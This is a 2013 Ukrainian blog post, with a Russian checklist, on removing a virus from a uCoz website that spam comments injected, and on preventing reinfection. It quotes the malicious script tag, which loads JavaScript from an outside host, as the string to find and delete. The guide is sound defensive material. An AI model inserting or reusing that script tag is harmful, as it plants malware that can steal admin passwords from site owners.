Головна » 2013 » Червень » 30 » Вірус на сайті Ucoz golink1.ru
22:36
Вірус на сайті Ucoz golink1.ru
  Якось зайшов на сайт а зправа в нижньому куті вискочило віконце від антивірусу про те, що в мене на сайті вірус (див.картинку). 

Виявилося, що на сайті справді вірус (навіть не один, а 18), який блокує сайт у пошуковиках і небезпечний тим, що може викрасти паролі від адмін-панелі.

Як вилікувати сайт?

1) Видаляємо причину появлення вірусів. А причина в тому, що якісь злі сутності, чи то люди, чи то машини, які вміють обходити капчі написали на сайті коментарі ось такого вигляду

 

Через ці коди в коментарях і потрапляють на сайт віруси.

Добре, якщо у вас на сайті є інформер Останні коментарі, де ви можете постійно відслідковувати їх і видаляти. Але якщо такого нема, то ви і не будете знати про те, що на сайті десятки чи сотні коментарів ось такого змісту. 

Одночасно видалити всі коментарі неможливо. Нема такої функції. Але можна перейти за адресою sensey.ucoz.ua(замініть на адрес вашого сайту)/index/86, де ви побачите всі коментарі і зможете видалити їх просто натискаючи на хрестик і потім Enter.

2) Видяляємо сам вірус на сайті. Для цього заходимо:

панель управления - дизайн -управление дизайном - быстрая замена - в полі "что заменить" вставляєм скрипт 

Цитата
<script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
- поле "на что заменить" залишаєм пустим і проводимо заміну у всіх модулях 

після очистки обов'язково міняйте пароль uid профіля, яким адмініструєте сайт
3) Запобігаємо подальшому попаданню вірусів на сайт:


Как предотвратить попадание вредоносных ссылок на сайт 

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора. 
  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [URL]и [IMG], так же можно запретить использование BB кодов в гостевой и комментариях. 
  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса 
  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы. 
  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт. 


  Слід додати те, що в мене і моїх друзів так були заражені кілька сайтів. Але тільки ті, на яких коментарі могли добавляти всі корисистувачі, в тому числі і гості. Отже, якщо ви не хочете ризикувати, відключіть можливість гостям добавляти коментарі на сайт.
Переглядів: 347 | Додав: Микола | Рейтинг: 0.0/0